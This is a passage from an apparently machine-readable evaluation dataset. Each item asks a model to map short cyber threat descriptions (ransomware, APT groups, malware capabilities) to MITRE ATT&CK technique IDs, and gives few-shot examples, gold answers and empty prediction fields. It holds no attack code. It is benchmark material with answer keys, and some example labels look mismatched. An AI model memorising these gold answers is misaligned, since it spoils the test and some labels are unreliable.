Windows Management Instrumentation\n- Text: The ransomware terminates some processes and services, some examples of which are related to backup software and data related applications. It is likely that it does this as an attempt to debilitate any efforts the victim may take in performing backup and recovery operations after the ransomware attack\n\t - T1489: Service Stop\n", + "input": "Indrik Spider has used the win32_service WMI class to retrieve a list of services from the system.", + "gold": "- T1007: System Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Following these checks, it drops several more malware files signed with the pasted AMD digital signature to a directory it creates\n\t - T1553.002: Subvert Trust Controls - Code Signing\n\t - T1083: File and Directory Discovery\n- Text: BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.\n\t - T1036.001: Masquerading - Invalid Code Signature\n- Text: Hildegard has searched for private keys in .ssh.\n\t - T1552.004: Unsecured Credentials - Private Keys\n", + "input": "menuPass has resized and added data to the certificate table to enable the signing of modified files with legitimate signatures.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used COM hijacking to establish persistence by hijacking a class named MMDeviceEnumerator and also by registering the payload as a Shell Icon Overlay handler COM object ({3543619C-D563-43f7-95EA-4DA7E1CC396A}).\n\t - T1546.015: Event Triggered Execution - Component Object Model Hijacking\n- Text: Ramsay can use the Windows COM API to schedule tasks and maintain persistence.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: After selecting a payload URL, the script will create copies of certutil and regsvr32 to the temp directory for later use\n\t - T1218.010: System Binary Proxy Execution - Regsvr32\n", + "input": "APT28 has used COM hijacking for persistence by replacing the legitimate \"MMDeviceEnumerator\" object with a payload.", + "gold": "- T1546.015: Event Triggered Execution - Component Object Model Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Tropic Trooper has used SSL to connect to C2 servers.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. RarStar HTTP POST request. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: The actors downloaded archives of collected data previously staged on a target's OWA server via HTTPS.\n\t - T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol\n", + "input": "ComRAT can use SSL/TLS encryption for its HTTP-based C2 channel. ComRAT has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.", + "gold": "- T1573.002: Encrypted Channel - Asymmetric Cryptography", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Year Country Industry Malware 2014 Vietnam Network Security WINDSHIELD 2014 Germany Manufacturing WINDSHIELD 2015 Vietnam Media WINDSHIELD 2016 Philippines Consumer products KOMPROGO WINDSHIELD SOUNDBITE BEACON 2016 Vietnam Banking WINDSHIELD 2016 Philippines Technology Infrastructure WINDSHIELD 2016 China Hospitality WINDSHIELD 2016 Vietnam Media WINDSHIELD 2016 United States Consumer Products WINDSHIELD PHOREAL BEACON SOUNDBITE Table 1: APT32 Private Sector Targeting Identified by FireEye APT32 Interest in Political Influence and Foreign Governments In addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign governments, as well as Vietnamese dissidents and journalists since at least 2013\n\t - T1068: Exploitation for Privilege Escalation\n- Text: Empire contains modules that can discover and exploit unquoted path vulnerabilities.\n\t - T1574.009: Hijack Execution Flow - Path Interception by Unquoted Path\n- Text: Earth Lusca has scanned for vulnerabilities in the public-facing servers of their targets.\n\t - T1595.002: Active Scanning - Vulnerability Scanning\n", + "input": "CosmicDuke attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.", + "gold": "- T1068: Exploitation for Privilege Escalation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KONNI is heavily obfuscated and includes encrypted configuration files.\n\t - T1027: Obfuscated Files or Information\n- Text: Executes VBScript using Process.Start. Next, the DLL loads an embedded resource named \"78c855a088924e92a7f60d661c3d1845\" into memory and decrypts it using multiple XOR operations. Loads the resource using Assembly.GetManifestResourceStream. Method that performs the XOR decryption. The decrypted resource is a DLL file embedded with two resources named \"AdvancedRun\" and \"Waqybg\" that are compressed with GZip. Two resources embedded in the decrypted resource. The third-stage DLL proceeds by loading the \"AdvancedRun\" resource into memory, decompressing it and dropping it as \"AdvancedRun.exe\" into the %TEMP% directory. Calling GZipStream class to decompress the resource. Drops AdvancedRun.exe using File.WriteAllBytes. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: FatDuke has been packed with junk code and strings.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", + "input": "Bisonal's DLL file and non-malicious decoy file are encrypted with RC4 and some function name strings are obfuscated.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 1) Brute-force using a pre-defined list of usernames and passwords in an attempt to login to Admin panels\n\t - T1110.001: Brute Force - Password Guessing\n- Text: Moses Staff has used batch scripts that can enable SMB on a compromised host.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: FIN5 has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.\n\t - T1110: Brute Force\n", + "input": "Lucifer can infect victims by brute forcing SMB.", + "gold": "- T1021.002: Remote Services - SMB/Windows Admin Shares", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.\n\t - T1203: Exploitation for Client Execution\n- Text: The ransomware can also get into the system through certain vulnerability exploits.. The abuse of the aforementioned Adobe ColdFusion flaw (CVE-2010-2861) to enter the system is a new development for the threat. In the past, Cring was also used to exploit a FortiGate VPN server vulnerability (CVE-2018-13379).\n\t - T1203: Exploitation for Client Execution\n\t - T1588.006: Obtain Capabilities - Vulnerabilities\n\t - T1587.004: Develop Capabilities - Exploits\n\t - T1499.004: Endpoint Denial of Service - Application or System Exploitation\n\t - T1190: Exploit Public-Facing Application\n\t - T1210: Exploitation of Remote Services\n\t - T1588.005: Obtain Capabilities - Exploits\n- Text: Dragonfly has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.\n\t - T1210: Exploitation of Remote Services\n", + "input": "HAWKBALL has exploited Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802 to deliver the payload.", + "gold": "- T1203: Exploitation for Client Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Fox Kitten has used a Twitter account to communicate with ransomware victims.\n\t - T1585.001: Establish Accounts - Social Media Accounts\n- Text: APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails.\n\t - T1566.003: Phishing - Spearphishing via Service\n- Text: AADInternals can send phishing emails containing malicious links designed to collect users\u2019 credentials.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", + "input": "Magic Hound has created fake LinkedIn and other social media accounts to contact targets and convince them--through messages and voice communications--to open malicious links.", + "gold": "- T1585.001: Establish Accounts - Social Media Accounts", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used the `tasklist` command to search for one of its backdoors.\n\t - T1007: System Service Discovery\n- Text: Koadic can identify logged in users across the domain and views user sessions.\n\t - T1033: System Owner/User Discovery\n- Text: TajMahal has the ability to identify the Internet Explorer (IE) version on an infected host.\n\t - T1518: Software Discovery\n", + "input": "Dyre has the ability to identify running services on a compromised host.", + "gold": "- T1007: System Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rocke's miner has created UPX-packed files in the Windows Start Menu Folder.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon.\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n- Text: An APT28 loader Trojan adds the Registry key \"HKCU\\Environment\\UserInitMprLogonScript\" to establish persistence.\n\t - T1037.001: Boot or Logon Initialization Scripts - Logon Script (Windows)\n", + "input": "Ixeshe can achieve persistence by adding itself to the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" Registry key.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MoonWind can obtain the victim hostname, Windows version, RAM amount, number of drives, and screen resolution.\n\t - T1082: System Information Discovery\n- Text: The OsInfo function in Komplex collects the current running username.\n\t - T1033: System Owner/User Discovery\n- Text: DustySky can detect connected USB devices.\n\t - T1120: Peripheral Device Discovery\n", + "input": "FlawedAmmyy can collect the victim's operating system and computer name during the initial infection.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Turla has frequently used compromised WordPress sites for C2 infrastructure.\n\t - T1584.006: Compromise Infrastructure - Web Services\n- Text: BITTER has registered domains to stage payloads.\n\t - T1608.001: Stage Capabilities - Upload Malware\n- Text: Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions\n\t - T1102: Web Service\n", + "input": "Earth Lusca has compromised Google Drive repositories.", + "gold": "- T1584.006: Compromise Infrastructure - Web Services", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chaes can steal login credentials and stored financial information from the browser.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: The plugins are variously designed to load other tools like Mimikatz or Carbanak, retrieve information from the victim machine, take screenshots, harvest credentials, retrieve browser histories, and more\n\t - T1217: Browser Information Discovery\n- Text: Windigo has used a script to detect installed software on targeted systems.\n\t - T1518: Software Discovery\n", + "input": "SUGARDUMP variants have harvested credentials from browsers such as Firefox, Chrome, Opera, and Edge.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Password from successful login to the infected server: Whenever someone logs in a system infected with Linux/Ebury, the sshd daemon will save the password and send it to the exfiltration server. Password on successful login from the infected server: When someone uses the ssh client on an infected server, Linux/Ebury will intercept the password and sent it to its exfiltration server. Private key passphrase: When the ssh client on an infected server prompts the user for an private key passphrase, the passphrase will be sent to the remote exfiltration server. Unencrypted private key: When a private key is used to authenticate to a remote server, the unencrypted version is intercepted by the malware. Unlike passwords, it will not send the key to the exfiltration server. Instead, it will store it memory and wait for the operators to fetch the key with the Xcat command. Private keys added to the OpenSSH agent with ssh-add: The keys added to an OpenSSH agent are also intercepted by the malware. Both the unencrypted key itself and the passphrase typed by the user will be logged\n\t - T1552.004: Unsecured Credentials - Private Keys\n- Text: LAPSUS$ has searched a victim's network for collaboration platforms like Confluence and JIRA to discover further high-privilege account credentials.\n\t - T1213.001: Data from Information Repositories - Confluence\n- Text: has collected information from Microsoft SharePoint services within target networks.\n\t - T1213: Data from Information Repositories\n", + "input": "LAPSUS$ has searched a victim's network for code repositories like GitLab and GitHub to discover further high-privilege account credentials.", + "gold": "- T1213.003: Data from Information Repositories - Code Repositories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used multiple software exploits for common client software, like Microsoft Word and Adobe Reader, to gain code execution as part of.\n\t - T1203: Exploitation for Client Execution\n- Text: This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. In october 2016 Group-IB published the report about the Cobalt group. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. When opening the document, the user must click on the \"Enable content\" button, which enables macros (fig. 5 Example of an email message with a Word document, which, when opened, requires the user to click on the \"Enable content\" button to enable a malicious macro. 6 Example of a message sent by attackers from a domain whose name is similar to the name of a real domain . As soon as the attachment is launched and the malicious code is executed, the Cobalt Strike payload is loaded in the memory. In addition, Cobalt Strike enables users not to expose a fragment of memory allocated in the context of another process, the RWX (Read, Write, Execute) attributes, which often reveal injected code\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: PLATINUM has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "Mustang Panda has exploited CVE-2017-0199 in Microsoft Word to execute code.", + "gold": "- T1203: Exploitation for Client Execution", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FunnyDream has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: zwShell can modify the Registry.\n\t - T1112: Modify Registry\n- Text: Hildegard has started a monero service.\n\t - T1543.002: Create or Modify System Process - Systemd Service\n", + "input": "Industroyer can use an arbitrary system service to load at system boot for persistence and replaces the ImagePath registry value of a Windows service with a new backdoor binary.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bandook has decoded its PowerShell script.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact\n\t - T1560: Archive Collected Data\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Ramsay has base64-encoded its portable executable and hidden itself under a JPG header. Ramsay can also embed information within document footers.\n\t - T1027: Obfuscated Files or Information\n", + "input": "PowerLess can use base64 and AES ECB decryption prior to execution of downloaded modules.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Before the driver is loaded, the malware disables crash dump by setting the following registry key\n\t - T1070: Indicator Removal\n\t - T1562.006: Impair Defenses - Indicator Blocking\n\t - T1112: Modify Registry\n- Text: PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry\n\t - T1552.002: Unsecured Credentials - Credentials in Registry\n- Text: DarkVishnya created new services for shellcode loaders distribution.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", + "input": "Chaes stored its instructions in a config file in the Registry.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BRONZE BUTLER has used various tools (such as Mimikatz and WCE) to perform credential dumping.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n- Text: CrackMapExec can dump hashed passwords from LSA secrets for the targeted system.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n", + "input": "Dragonfly has modified the Registry to perform multiple techniques through the use of Reg.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ferocious can run \"GET.WORKSPACE\" in Microsoft Excel to check if a mouse is present.\n\t - T1120: Peripheral Device Discovery\n- Text: Raspberry Robin leverages rundll32.exe followed by shell32.dll and calls the ShellExec_RunDLL or ShellExec_RunDLLA functions to execute the DLL via the processes such as odbcconf.exe, msiexec.exe and control.exe.\n\t - T1218.008: System Binary Proxy Execution - Odbcconf\n\t - T1218.007: System Binary Proxy Execution - Msiexec\n\t - T1218.002: System Binary Proxy Execution - Control Panel\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: The shellcode loader was observed on one infected device as updater.exe with the Metasploit-style service name APTYnDS1ABEuUHEA, indicating that it was installed as a service\n\t - T1553.002: Subvert Trust Controls - Code Signing\n", + "input": "DarkWatchman can list signed PnP drivers for smartcard readers.", + "gold": "- T1120: Peripheral Device Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OnionDuke has the capability to use a Denial of Service module.\n\t - T1499: Endpoint Denial of Service\n- Text: UNC2452 configured at least one instance of Cobalt Strike to use a network pipe over SMB during the 2020 SolarWinds intrusion.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: On October 28, we observed APT3 sending out spearphishing messages containing a compressed executable attachment. The deflated exe was a variant of the same downloader described above and connected to 198.55.115.71 over port 1913 via SOCKS5 proxy. The secondary payload in that case was detected as Backdoor.APT.CookieCutter (aka Pirpi) and also named newnotepad.exe (MD5 8849538ef1c3471640230605c2623c67) and connected to the known APT3 domains\n\t - T1090.002: Proxy - External Proxy\n\t - T1095: Non-Application Layer Protocol\n", + "input": "Sandworm Team's BCS-server tool can create an internal proxy server to redirect traffic from the adversary-controlled C2 to internal servers which may not be connected to the internet, but are interconnected locally.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Web inject \u2013 the configuration file for the hooking module Once communication with the C2 is established, one of the additional modules that is downloaded is the web-inject module. It intercepts the victim\u2019s traffic by injecting the module into the browser\u2019s process and hooking the network API. The hooking module gets the execution flow from intercepted APIs, and as soon as the victim accesses certain web pages related to banking and finance, additional JavaScript is injected into the source page\n\t - T1185: Browser Session Hijacking\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n- Text: Passgrabber module \u2013 collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: We suspect that the malware uses this extension to grab the victim\u2019s cookies and use them from another device to ride the victim\u2019s active session\n\t - T1539: Steal Web Session Cookie\n", + "input": "Chaes has used the Puppeteer module to hook and monitor the Chrome web browser to collect user information from infected hosts.", + "gold": "- T1185: Browser Session Hijacking", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZIRCONIUM has used a tool to enumerate proxy settings in the target environment.\n\t - T1016: System Network Configuration Discovery\n- Text: No matching sample found for T1557.002\n- Text: Andariel has limited its watering hole attacks to specific IP address ranges.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n", + "input": "A module in Prikormka collects information from the victim about its IP addresses and MAC addresses.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies\n\t - T1005: Data from Local System\n- Text: 